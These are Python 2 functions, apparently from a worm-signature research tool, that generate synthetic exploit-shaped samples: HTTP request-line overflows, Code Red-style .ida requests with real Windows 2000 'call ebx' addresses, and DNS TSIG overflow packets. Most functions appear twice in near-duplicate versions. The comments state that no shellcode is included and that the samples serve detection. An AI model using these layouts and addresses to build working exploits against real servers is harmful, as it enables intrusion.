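def generate(self, count):
    """Yield ``count`` synthetic HTTP GET request-line overflow samples.

    Each sample is ``GET /`` + 701 filler bytes + a 4-byte little-endian
    return address + ``self.after_ra_len`` more filler bytes +
    `` HTTP/1.1\\r\\n``.  The return address is ``self.ra`` perturbed by a
    uniform offset in ``[-self.modulation, self.modulation]`` so the
    address field is not a constant byte pattern across samples.

    Filler bytes are drawn from every byte value except NUL and ASCII
    whitespace -- presumably so the filler cannot terminate the request
    line early in the target's parser; confirm against the modelled
    target before changing the alphabet.

    Args:
        count: number of samples to yield.

    Yields:
        str (Python 2 byte string): one request per iteration.

    Raises:
        struct.error: if ``self.ra`` plus the modulation falls outside
            the unsigned 32-bit range.
    """
    # Alphabet for the filler: all 256 byte values minus NUL and whitespace.
    unsafe = set(string.whitespace + chr(0))
    safe_chars = [chr(c) for c in xrange(256) if chr(c) not in unsafe]
    pre_ra_len = 701  # fixed filler length before the return address

    for _ in xrange(count):
        parts = ['GET /', random_bytes(pre_ra_len, safe_chars)]
        this_ra = self.ra + random.randint(-self.modulation, self.modulation)
        # '<L' is 4 bytes little-endian on every host.  The original used
        # native 'L', which is 8 bytes on LP64 hosts: that lengthens the
        # sample and pads the address with NUL bytes that the filler
        # alphabet deliberately avoids.  (Assumes a little-endian x86
        # target -- TODO confirm.)  Raises struct.error if this_ra is
        # outside 0..2**32-1.
        parts.append(struct.pack('<L', this_ra))
        parts.append(random_bytes(self.after_ra_len, safe_chars))
        parts.append(' HTTP/1.1\r\n')
        yield ''.join(parts)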
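def generate(self, count):
    """Yield ``count`` synthetic HTTP GET request-line overflow samples.

    Layout of each sample: ``GET /``, 701 filler bytes, a 4-byte
    little-endian return address, ``self.after_ra_len`` filler bytes,
    then `` HTTP/1.1\\r\\n``.  The return address is ``self.ra`` shifted
    by a uniform random offset in ``[-self.modulation, self.modulation]``
    so that the address bytes vary from sample to sample.

    The filler alphabet is every byte value except NUL and ASCII
    whitespace -- presumably so filler cannot end the request line early
    in the target's parser; confirm before changing it.

    Args:
        count: number of samples to yield.

    Yields:
        str (Python 2 byte string): one request per iteration.

    Raises:
        struct.error: if the modulated address is outside 0..2**32-1.
    """
    excluded = set(string.whitespace + chr(0))
    safe_chars = [chr(c) for c in xrange(256) if chr(c) not in excluded]
    pre_ra_len = 701  # filler length before the return address

    for _ in xrange(count):
        pieces = ['GET /', random_bytes(pre_ra_len, safe_chars)]
        this_ra = self.ra + random.randint(-self.modulation, self.modulation)
        # Explicit 4-byte little-endian.  Native 'L' (as originally used)
        # packs 8 bytes on LP64 hosts, which both changes the sample length
        # and inserts NUL bytes that the filler alphabet excludes.
        # Assumes a little-endian x86 target -- TODO confirm.
        pieces.append(struct.pack('<L', this_ra))
        pieces.append(random_bytes(self.after_ra_len, safe_chars))
        pieces.append(' HTTP/1.1\r\n')
        yield ''.join(pieces)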
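def generate(self, count):
    """Yield ``count`` synthetic Code Red-style ``.ida`` GET requests.

    Layout of each sample:
      ``GET /`` + 1-9 random letters + ``.ida?`` + 222 letters +
      one of ``NN``/``XX``/``CC`` + 15 letters + one ``%uXXXX%uXXXX``
      encoded ``call ebx`` address + 15 letters + ``=`` + 7 letters +
      `` HTTP/1.0\\r\\n``.

    Per the original comments, ``NN``/``XX``/``CC`` is the marker used
    by Code Red, Code Red II and the eEye example exploit respectively,
    and the ``%u`` addresses are ``call ebx`` locations in Windows 2000
    SP0/SP1 DLLs (low word first).  No HTTP headers and no shellcode are
    emitted (FIXME inherited from the original), so these are samples
    for signature generation, not a working exploit.

    Args:
        count: number of samples to yield.

    Yields:
        str: one request per iteration.
    """
    # The original also built an unused 'safe_chars' alphabet and an unused
    # 'samples' list; both removed.  ascii_letters is used instead of the
    # locale-dependent string.letters so the alphabet is the same on every
    # host (identical under the C locale).
    letters = string.ascii_letters
    call_ebx_addrs = [
        # locations of call ebx in win2k sp0 and sp1
        '%u41f9%u7800',  # 0x780041f9
        '%u4223%u7800',  # 0x78004223
        '%ucb65%u7801',  # 0x7801cb65
        '%ucbd3%u7801',  # 0x7801cbd3 (used in actual codered)
        '%ucf3f%u7801',  # 0x7801cf3f
        '%ub23f%u7802',  # 0x7802b23f
    ]

    for _ in xrange(count):
        parts = ['GET /']
        parts.append(random_bytes(random.randrange(1, 10), letters))
        parts.append('.ida?')
        parts.append(random_bytes(222, letters))
        # NN used in codered, XX in coderedII, CC in eeye example exploit
        parts.append(random.choice(['NN', 'XX', 'CC']))
        # The original author was unsure about this field; it appears to
        # correspond to assembly code in codered.
        parts.append(random_bytes(15, letters))
        # codered causes control to jump to a 'call ebx' within a windows dll
        parts.append(random.choice(call_ebx_addrs))
        parts.append(random_bytes(15, letters))
        parts.append('=')
        parts.append(random_bytes(7, letters))
        parts.append(' HTTP/1.0\r\n')
        # FIXME- still need headers and shellcode
        yield ''.join(parts)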
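def generate(self, count):
    """Yield ``count`` synthetic Code Red-style ``.ida`` GET requests.

    Each sample is ``GET /``, 1-9 random letters, ``.ida?``, 222 letters,
    a marker (``NN`` for Code Red, ``XX`` for Code Red II, ``CC`` for the
    eEye example exploit, per the original comments), 15 letters, one
    ``%u``-encoded ``call ebx`` address from Windows 2000 SP0/SP1 DLLs
    (low word first), 15 letters, ``=``, 7 letters and
    `` HTTP/1.0\\r\\n``.

    No headers and no shellcode are produced (FIXME carried over from
    the original): the output is intended for signature generation, not
    for delivery to a server.

    Args:
        count: number of samples to yield.

    Yields:
        str: one request per iteration.
    """
    # Removed the original's unused 'safe_chars' alphabet and 'samples'
    # list.  ascii_letters replaces the locale-dependent string.letters
    # (same value under the C locale, stable elsewhere).
    letters = string.ascii_letters
    call_ebx_addrs = [
        # locations of call ebx in win2k sp0 and sp1
        '%u41f9%u7800',  # 0x780041f9
        '%u4223%u7800',  # 0x78004223
        '%ucb65%u7801',  # 0x7801cb65
        '%ucbd3%u7801',  # 0x7801cbd3 (used in actual codered)
        '%ucf3f%u7801',  # 0x7801cf3f
        '%ub23f%u7802',  # 0x7802b23f
    ]

    for _ in xrange(count):
        req = ['GET /']
        req.append(random_bytes(random.randrange(1, 10), letters))
        req.append('.ida?')
        req.append(random_bytes(222, letters))
        # NN used in codered, XX in coderedII, CC in eeye example exploit
        req.append(random.choice(['NN', 'XX', 'CC']))
        # Unclear field per the original author; appears to be assembly
        # code in codered.
        req.append(random_bytes(15, letters))
        # codered causes control to jump to a 'call ebx' within a windows dll
        req.append(random.choice(call_ebx_addrs))
        req.append(random_bytes(15, letters))
        req.append('=')
        req.append(random_bytes(7, letters))
        req.append(' HTTP/1.0\r\n')
        # FIXME- still need headers and shellcode
        yield ''.join(req)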
def special_random_bytes(count, safe):
    """Return ``count`` bytes mixing random filler with a running counter.

    The output is produced two bytes at a time.  With probability ``p``
    (module global) a pair is the native-endian 16-bit encoding of the
    module global ``counter``; otherwise it is two bytes from
    ``worm_gen.random_bytes(2, safe)``.  ``counter`` is incremented once
    per pair regardless of which branch was taken, so it keeps advancing
    across calls.

    Args:
        count: number of bytes to return; an odd count drops the last
            byte of the final pair.
        safe: alphabet forwarded to ``worm_gen.random_bytes``.

    Returns:
        str: ``count`` bytes (Python 2 byte string).

    NOTE(review): ``struct.pack('H', counter)`` raises struct.error once
    the global counter passes 0xffff (roughly 128 KiB of total output).
    Whether wrapping (``counter & 0xffff``) is acceptable is not
    established here -- confirm before relying on long runs.  The
    ``chunk[0]``/``chunk[1]`` indexing assumes Python 2 ``str``.
    """
    import random
    import struct
    global counter
    global p
    pairs = []
    produced = 0
    while produced < count:
        if random.random() < p:
            chunk = struct.pack('H', counter)
        else:
            chunk = worm_gen.random_bytes(2, safe)
        pairs.append(chunk[0])
        pairs.append(chunk[1])
        produced += 2
        counter += 1
    return ''.join(pairs[:count])
def _rand_header():
    """Return one random ``Name: value\\r\\n`` HTTP header line.

    The name is 3-9 and the value 10-19 characters, both drawn by
    ``random_bytes`` from ``string.letters + string.digits``.

    Returns:
        str: the header line including the trailing CRLF.
    """
    alphabet = string.letters + string.digits
    name = random_bytes(random.randrange(3, 10), alphabet)
    value = random_bytes(random.randrange(10, 20), alphabet)
    return name + ": " + value + "\r\n"
def _rand_header():
    """Return one random ``Name: value\\r\\n`` HTTP header line.

    Name length is 3-9 and value length 10-19; both are produced by
    ``worm_gen.random_bytes`` over ``string.letters + string.digits``.

    Returns:
        str: the header line, CRLF-terminated.
    """
    alphabet = string.letters + string.digits
    header_name = worm_gen.random_bytes(random.randrange(3, 10), alphabet)
    header_value = worm_gen.random_bytes(random.randrange(10, 20), alphabet)
    return "%s: %s\r\n" % (header_name, header_value)
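def generate(self, count):
    """Yield ``count`` synthetic DNS query packets shaped like the
    overflow exploit the original comments call the "published exploit".

    The header is mostly random (ID, flags, counts) except that the QR
    bit is cleared (query) and ARCOUNT is non-zero.  Two random-filled
    "QNAME"s follow -- the original comments describe the first as the
    shellcode slot and the second as the overwritten stack frame -- with
    a fixed ``\\xff\\xbf`` high-address suffix, then a short name, a fixed
    record type ``0x00FA`` (250, the TSIG RR type) and a random class.
    Names are *not* label-encoded and no real shellcode is included:
    these samples are for signature generation, not for sending to a
    server.

    Args:
        count: number of samples to yield.

    Yields:
        str (Python 2 byte string): one packet per iteration.
    """
    # Any byte value is allowed here (the packet is binary, not a request
    # line).  Built once rather than per sample; the original named this
    # list 'bytes', shadowing the builtin.
    alphabet = [chr(c) for c in xrange(256)]

    for _ in xrange(count):
        pkt = []
        # DNS ID
        pkt.append(random_bytes(2, alphabet))
        # First flags byte: clear the top bit (QR = query); the rest is
        # random.
        pkt.append(chr(random.randrange(256) & 0x7f))
        # 'recursion not available' and friends.  The original comments say
        # the other bits should be zero but are not checked by the server.
        # NOTE(review): this emits two random bytes where the commented-out
        # alternative in the original, random.choice(['\x80', '\x00']),
        # emitted one, so the header is 13 bytes rather than the usual 12.
        # Kept as-is; confirm against the modelled exploit.
        pkt.append(random_bytes(2, alphabet))
        # QDCOUNT: 2 in the published exploit, random here.  Realistically
        # only a small number would be accepted.
        pkt.append(random_bytes(2, alphabet))
        # ANCOUNT
        pkt.append(random_bytes(2, alphabet))
        # NSCOUNT
        pkt.append(random_bytes(2, alphabet))
        # ARCOUNT: anything but zero.  Native byte order as in the original;
        # the value is non-zero either way.
        pkt.append(struct.pack("H", random.randint(1, 0xffff)))
        # First "QNAME" (shellcode slot).  Technically this needs label
        # encoding (length byte, that many bytes, ...); for signature
        # generation random bytes are as good.
        pkt.append(random_bytes(256, alphabet))
        # QTYPE/QCLASS of the first question (nominally \x00\x01\x00\x01);
        # the original comments say the server does not check them.
        pkt.append(random_bytes(4, alphabet))
        # Second "QNAME" (part of it is used as the stack frame after the
        # overwrite).
        pkt.append(random_bytes(62, alphabet))
        # Stack address(es).  The original comments disagree on whether one
        # or two are needed; the surviving layout is four random bytes then
        # the fixed high bytes \xff\xbf.
        pkt.append(random_bytes(2, alphabet))
        pkt.append(random_bytes(2, alphabet))
        pkt.append("\xff\xbf")
        # The rest of the second QNAME, NUL-terminated.
        pkt.append(random_bytes(200, alphabet))
        pkt.append(chr(0))
        # QTYPE/QCLASS of the second question; not checked by the server.
        pkt.append(random_bytes(4, alphabet))
        # Another encoded name ending with 00 (zero-length in the actual
        # exploit).
        pkt.append(random_bytes(10, alphabet))
        pkt.append(chr(0))
        # Record type. FIXED: 0x00FA.
        pkt.append(chr(0) + chr(0xFA))
        # Record class: should be 0x00ff, but not checked by the server.
        pkt.append(random_bytes(2, alphabet))
        yield "".join(pkt)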
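def generate(self, count):
    """Yield ``count`` synthetic DNS query packets modelled on the
    "published exploit" referred to in the original comments.

    Header fields are random except that the QR bit is cleared (query)
    and ARCOUNT is non-zero.  Two random-filled "QNAME"s follow (per the
    original comments: a shellcode slot, then the data that becomes the
    stack frame after the overwrite) with a fixed ``\\xff\\xbf``
    high-address suffix, a short trailing name, a fixed record type
    ``0x00FA`` (250, the TSIG RR type) and a random class.  Names are not
    label-encoded and no real shellcode is present; the output is for
    signature generation only.

    Args:
        count: number of samples to yield.

    Yields:
        str (Python 2 byte string): one packet per iteration.
    """
    # Full 0..255 alphabet, built once.  (The original rebuilt it per
    # sample under the name 'bytes', shadowing the builtin.)
    alphabet = [chr(c) for c in xrange(256)]

    for _ in xrange(count):
        pkt = []
        # DNS ID
        pkt.append(random_bytes(2, alphabet))
        # First flags byte with the top (QR) bit cleared: a query.
        pkt.append(chr(random.randrange(256) & 0x7f))
        # 'recursion not available' and the other flag bits; the original
        # comments say they should be zero but are not checked by the server.
        # NOTE(review): two random bytes are emitted here where the
        # commented-out original alternative random.choice(['\x80', '\x00'])
        # emitted one, making the header 13 bytes instead of 12.  Left
        # unchanged; confirm against the modelled exploit.
        pkt.append(random_bytes(2, alphabet))
        # QDCOUNT: 2 in the published exploit, random here (realistically
        # only a small number would be accepted).
        pkt.append(random_bytes(2, alphabet))
        # ANCOUNT
        pkt.append(random_bytes(2, alphabet))
        # NSCOUNT
        pkt.append(random_bytes(2, alphabet))
        # ARCOUNT: anything but zero (native byte order as in the original;
        # non-zero in either order).
        pkt.append(struct.pack('H', random.randint(1, 0xffff)))
        # First "QNAME" (shellcode slot); not label-encoded -- random bytes
        # suffice for signature generation.
        pkt.append(random_bytes(256, alphabet))
        # QTYPE/QCLASS of the first question (nominally \x00\x01\x00\x01),
        # reportedly unchecked by the server.
        pkt.append(random_bytes(4, alphabet))
        # Second "QNAME" (part becomes the stack frame after the overwrite).
        pkt.append(random_bytes(62, alphabet))
        # Stack address(es): the original comments disagree on one vs. two;
        # the surviving layout is four random bytes then the fixed \xff\xbf.
        pkt.append(random_bytes(2, alphabet))
        pkt.append(random_bytes(2, alphabet))
        pkt.append('\xff\xbf')
        # Remainder of the second QNAME, NUL-terminated.
        pkt.append(random_bytes(200, alphabet))
        pkt.append(chr(0))
        # QTYPE/QCLASS of the second question; not checked by the server.
        pkt.append(random_bytes(4, alphabet))
        # Another encoded name ending with 00 (zero-length in the actual
        # exploit).
        pkt.append(random_bytes(10, alphabet))
        pkt.append(chr(0))
        # Record type. FIXED: 0x00fa.
        pkt.append(chr(0) + chr(0xfa))
        # Record class: should be 0x00ff, but not checked by the server.
        pkt.append(random_bytes(2, alphabet))
        yield ''.join(pkt)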